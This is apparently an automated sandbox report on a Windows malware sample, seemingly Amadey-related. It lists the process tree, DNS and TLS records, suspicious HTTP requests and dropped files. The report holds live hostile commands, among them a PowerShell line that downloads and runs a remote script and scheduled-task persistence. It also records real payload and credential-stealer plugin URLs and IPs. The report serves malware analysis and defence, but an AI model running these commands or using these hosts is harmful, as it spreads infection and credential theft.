Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 26, 2023, 7:42 a.m. | June 26, 2023, 8:01 a.m. |
-
AAAd.exe "C:\Users\test22\AppData\Local\Temp\AAAd.exe"
2652 -
-
WPSOffice_11.exe "C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe" -downpower -msgwndname=wpssetup_message_1A705C3 -curinstalltemppath=C:\Users\test22\AppData\Local\Temp\wps\~1a70025\
560 -
certreq.exe "C:\Windows\system32\certreq.exe"
2368
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN jbruyer.exe /TR "C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe" /F
2856 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "jbruyer.exe" /P "test22:N"&&CACLS "jbruyer.exe" /P "test22:R" /E&&echo Y|CACLS "..\73456c80a6" /P "test22:N"&&CACLS "..\73456c80a6" /P "test22:R" /E&&Exit
2912-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2984 -
cacls.exe CACLS "jbruyer.exe" /P "test22:N"
3024 -
cacls.exe CACLS "jbruyer.exe" /P "test22:R" /E
1964 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2116 -
cacls.exe CACLS "..\73456c80a6" /P "test22:N"
2068 -
cacls.exe CACLS "..\73456c80a6" /P "test22:R" /E
2232
-
-
AAAd1.exe "C:\Users\test22\AppData\Local\Temp\1000001051\AAAd1.exe"
2384 -
-
toolspub1.exe "C:\Users\test22\AppData\Local\Temp\1000002051\toolspub1.exe"
2644
-
-
-
cmd.exe "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
2720-
powershell.exe powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')
2956
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
2860-
PING.EXE ping 127.0.0.1
2136
-
-
-
-
-
Install.exe .\Install.exe /S /site_id "385104"
2624
-
-
-
WPSOffice_11.exe "C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe"
2056 -
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a967e0f403b652\cred64.dll, Main
2124-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a967e0f403b652\cred64.dll, Main
1668
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a967e0f403b652\clip64.dll, Main
2248 -
-
-
Install.exe .\Install.exe /IjXdidOBxH "385118" /S
1140
-
-
-
staticlittlesource.exe "C:\Users\test22\AppData\Local\Temp\1000008051\staticlittlesource.exe"
1764
Name | Response | Post-Analysis Lookup |
---|---|---|
gejevesd.beget.tech | 91.106.207.112 | |
apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.67.53.18 |
foryourbar.org | 172.67.205.237 | |
galandskiyher2.com | 194.50.153.68 | |
wdl1.pcfg.cache.wpscdn.com |
CNAME
iduzw1u.qiniudns.com
|
104.17.188.189 |
sungeomatics.com | 205.134.251.88 |
IP Address | Status | Action |
---|---|---|
104.17.187.189 | Active | Moloch |
109.206.241.33 | Active | Moloch |
121.254.136.27 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.205.237 | Active | Moloch |
194.50.153.68 | Active | Moloch |
195.123.226.82 | Active | Moloch |
205.134.251.88 | Active | Moloch |
79.137.192.3 | Active | Moloch |
85.217.144.143 | Active | Moloch |
85.217.144.228 | Active | Moloch |
91.106.207.112 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49185 205.134.251.88:443 |
C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority | CN=sungeomatics.com | a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd |
TLSv1 192.168.56.101:49182 205.134.251.88:443 |
C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority | CN=sungeomatics.com | a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd |
TLSv1 192.168.56.101:49193 104.17.187.189:443 |
C=US, O=DigiCert, Inc., CN=RapidSSL Global TLS RSA4096 SHA256 2022 CA1 | CN=wdl1.pcfg.cache.wpscdn.com | 31:de:33:8a:83:3d:ab:45:d7:5d:69:e1:ed:3d:4f:a8:e4:8b:12:34 |
TLSv1 192.168.56.101:49856 172.67.205.237:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=foryourbar.org | d7:f1:86:9f:28:fa:5d:6c:4b:c7:e5:44:05:c2:45:df:03:de:c9:18 |
TLSv1 192.168.56.101:49381 172.67.205.237:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=foryourbar.org | d7:f1:86:9f:28:fa:5d:6c:4b:c7:e5:44:05:c2:45:df:03:de:c9:18 |
TLSv1 192.168.56.101:49855 205.134.251.88:443 |
C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority | CN=sungeomatics.com | a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd |
TLSv1 192.168.56.101:49857 172.67.205.237:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=foryourbar.org | d7:f1:86:9f:28:fa:5d:6c:4b:c7:e5:44:05:c2:45:df:03:de:c9:18 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
pdb_path | D:\Mktmp\Amadey\Release\Amadey.pdb |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://109.206.241.33/9bDc8sQ/index.php | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://109.206.241.33/9bDc8sQ/index.php?scr=1 | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://85.217.144.228/files/AAAd1.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://galandskiyher2.com/downloads/toolspub1.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://85.217.144.143/files/setup.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://109.206.241.33/9bDc8sQ/Plugins/cred64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://109.206.241.33/9bDc8sQ/Plugins/clip64.dll | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://gejevesd.beget.tech/385118/setup.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://195.123.226.82/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://79.137.192.3/staticlittlesource.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://85.217.144.143/files/My2.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://sungeomatics.com/css/colors/postmon.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://sungeomatics.com/css/colors/dd_64.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://sungeomatics.com/css/colors/cc2.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://sungeomatics.com/css/colors/cc3.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://sungeomatics.com/css/colors/cc4.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://sungeomatics.com/css/colors/cc5.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://sungeomatics.com/css/colors/cc1.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://sungeomatics.com/css/colors/cc2.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://sungeomatics.com/css/colors/cc3.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/download/11.2.0.11537/300.910/WPSOffice_11.2.0.11537.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://sungeomatics.com/css/colors/debug2.ps1 |
request | POST http://109.206.241.33/9bDc8sQ/index.php |
request | POST http://109.206.241.33/9bDc8sQ/index.php?scr=1 |
request | GET http://85.217.144.228/files/AAAd1.exe |
request | GET http://galandskiyher2.com/downloads/toolspub1.exe |
request | GET http://85.217.144.143/files/setup.exe |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://109.206.241.33/9bDc8sQ/Plugins/cred64.dll |
request | GET http://109.206.241.33/9bDc8sQ/Plugins/clip64.dll |
request | GET http://gejevesd.beget.tech/385118/setup.exe |
request | GET http://195.123.226.82/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM |
request | GET http://79.137.192.3/staticlittlesource.exe |
request | GET http://85.217.144.143/files/My2.exe |
request | GET https://sungeomatics.com/css/colors/postmon.exe |
request | GET https://sungeomatics.com/css/colors/dd_64.exe |
request | GET https://sungeomatics.com/css/colors/cc2.exe |
request | GET https://sungeomatics.com/css/colors/cc3.exe |
request | GET https://sungeomatics.com/css/colors/cc4.exe |
request | GET https://sungeomatics.com/css/colors/cc5.exe |
request | GET https://sungeomatics.com/css/colors/cc1.php |
request | GET https://sungeomatics.com/css/colors/cc2.php |
request | GET https://sungeomatics.com/css/colors/cc3.php |
request | GET https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/download/11.2.0.11537/300.910/WPSOffice_11.2.0.11537.exe |
request | GET https://sungeomatics.com/css/colors/debug2.ps1 |
request | POST http://109.206.241.33/9bDc8sQ/index.php |
request | POST http://109.206.241.33/9bDc8sQ/index.php?scr=1 |
regkey | .*Kingsoft |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_1.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-console-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\imageformats\qsvg.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-localization-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\extensibility.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\stdole.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-multibyte-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-synch-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-rtlsupport-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\7zS438C.tmp\Install.exe |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-private-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\ucrtbase.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-libraryloader-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\7zS4689.tmp\Install.exe |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-math-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\7zS4D99.tmp\Install.exe |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-debug-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5WidgetsKso.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5SvgKso.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5GuiKso.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\platforms\qwindows.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-time-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\styles\qwindowsvistastyle.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-utility-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\iconengines\qsvgicon.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\API-MS-Win-core-xstate-l2-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-filesystem-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\printsupport\windowsprintersupport.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\platforms\qdirect2d.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-synch-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\kpacketui.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_codecvt_ids.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-profile-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-interlocked-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msaddndr.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\vcruntime140.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_2.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-conio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-namedpipe-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-stdio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-errorhandling-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\concrt140.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-process-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-runtime-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-datetime-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-processthreads-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\73456c80a6\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | C:\Windows\sysnative\cmd.exe /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')" |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1') |
cmdline | C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL |
cmdline | "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL |
file | C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe |
file | C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-multibyte-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\gdiplus.dll |
file | C:\Users\test22\AppData\Local\Temp\nss8B83.tmp\System.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-util-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-profile-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\staticlittlesource[1].exe |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-private-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5CoreKso.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5WinExtrasKso.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-environment-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-localization-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-errorhandling-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_1.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-console-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-handle-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\nss8B83.tmp\AccessControl.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-debug-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-datetime-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-filesystem-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-rtlsupport-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\winamp58_3660_beta_full_en-us[1].exe |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-synch-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\setup[1].exe |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-convert-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\iconengines\qsvgicon.dll |
file | C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-processenvironment-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-utility-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-namedpipe-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\AAAd1[1].exe |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msaddndr.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-console-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\styles\qwindowsvistastyle.dll |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\clip64[1].dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\imageformats\qsvg.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5GuiKso.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-processthreads-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\kpacketui.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5SvgKso.dll |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\toolspub1[1].exe |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-runtime-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-sysinfo-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-process-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-conio-l1-1-0.dll |
wmi | SELECT * FROM Win32_Processor |
wmi | <INVALID POINTER> |
Data received | U |
Data received | Qs>1ôp_Öý]Éò0M Ä¥NÑÓDOWNGRD É×À[MmܱPõxgÚÁqøÌÉÅæL·cî / ÿ |
Data received | 2 |
Data received | |
Data received | |
Data received | |
Data received | |
Data received | 0 |
Data received | G N)X¦,ÖO/Í.ÍPüìãó1F_`ìãN#] ·jÞüLÐî¿ô |
Data received | |
Data received | ` |
Data received | ?ÛûE×;®UXÊA8Ó⹫äGÔqý¿|ȬAek-ié¶,â£ÿ',·@V{4rëü a)âØ|à,ÎhõÍp ébÂÎôØ (|xÇÔN4*«ÄÂ2uõÊk7t«¡Ñý¯8Ä!ý±®øY>òOU¨¡p§åÑ·,+r'˾}¬Å?Å?ûðz ° $| YbN·Þp#t Pú%c¤«%H%eâ¡\ËZ#¼|èçY©4Îgs0Ô8àú@Vìã?ÞϳnÎp%ÀËÉvJHÕî3û×ÓÁѵ\P®6.EMNm©6eqcèóZ¢µ²N6=Ö®jvzí¢7#Dü7GwÎkiBÛóV þósZ8Pg7ØÞ°sDþ߬ÉNZQóÖNï+Î?(&åáÇñêï 5ÓßèúU}¿ò'©Mñm]h õÓæöõááȪÈam1®Ö 6X²-gt@Ìó§ðÞÅ©Êf᧹ñT9êw¡ê¸C®ÕáKuàæÍçz0ΰÿ&ör0áÇH7IG8ÁÒçôGÞ±<+:äS¸{.,°ó úíNOüe©#MñmªNÉÅÊ=äqvÍ7ÃýRS^¯ÈXÖÁL¼h¨W0|©öÒÇÒéȸ¡ÉçqÏoBu²·OG/·i¡ÂÜs!¨d4½;ÚÖî·7÷nñÀRêEüh X R"À~A®ÂkWÒ´U´Èm¸MÜãõY»Ú°hm/SÍ ©DsõL,]«mµV<U¾ 7±û³û F¨ïÎ +%G¯æëû2ì÷£è´D¨Éwð¦1WpÖõc$}XáT£&4øJ Á Ëwe³(bo®]KP§0¯+}ºp¸½ÜL·åë.%/üE=ö'néï¾ÿ$üqmæHuB/ ¢ìhVþ%Iú+@ÜÎLEH/ç±j'µ ÇF²©þÍj·Öùì½°Æ"·=ëIíþPïóØÐ^]yKÝê¼!a]²OçàKÛ¯.æpÍçâÌ2Àî¥uVj*WCéKù7§6q+@é÷ÉAZâ_p·%&vi8EZÞ¢sç$£ð+*vd[çØz}s¤Ô#mO¯Ò)èx9,5»è!¢áôÂ,F@ª¢è"ÊYM¼ßÙø°=zþ¨Ê}àªT?¤ö~`ÂØimtÕÛ¬Ùmc<ÀÆ5å.Nö-ÐNË<ÙÞõÖ,!(rçê1 ´ÿZ¬É½ÿdVL|S¡éÞOßÙù[WÉþÓKi"ßæ@ÉLI[¤«ò(y_!íM UÎÏ8hãóüéòjÂΫíaÙ¶it5¥r¶ & º;µ8.Ñ££ëðA¹×çÔ$¨êõïΡ*+ø¼I·D²9×öK ©@3ECvöIÖFà1UÚÃ^«Kö§¶' .ü0ÌOÝ674å½³Zpü|øÂdØùh,/g»Èõk"ÒE X"½BºÉG´¬âä˯ QþûÝ râXvÄ?1«´Ã</r\³}cÞ2}ÖJ=[CíþÜÁ9üéìs¦vn±,gêZ¢3Íñ® ±7Îæ^±Ê ÇÉjaÊM§©P¿`ó¡¯@oq,É&8LÕJ%ß×ë¯ò©ÑÁ¾Ó¢uíëV98/E4XäxȹºÙËÕîbs<s ^$:ªv/À}³KOf jürF;ýÂ#6-On E«IyÑÐ~ £°,%éBk® fE¡}eLÂÑO¾PIÎÝ!/Ëç²0a$"FOR¼JÔ,+ñ+áHqÃàE£ÁR¨ßõ1ÊÄHbÉ÷WÑñóEÊ®aD4?oáCÂÎ ätÊY ldïîÝPìÅZ=±¿>!èøÄçå" |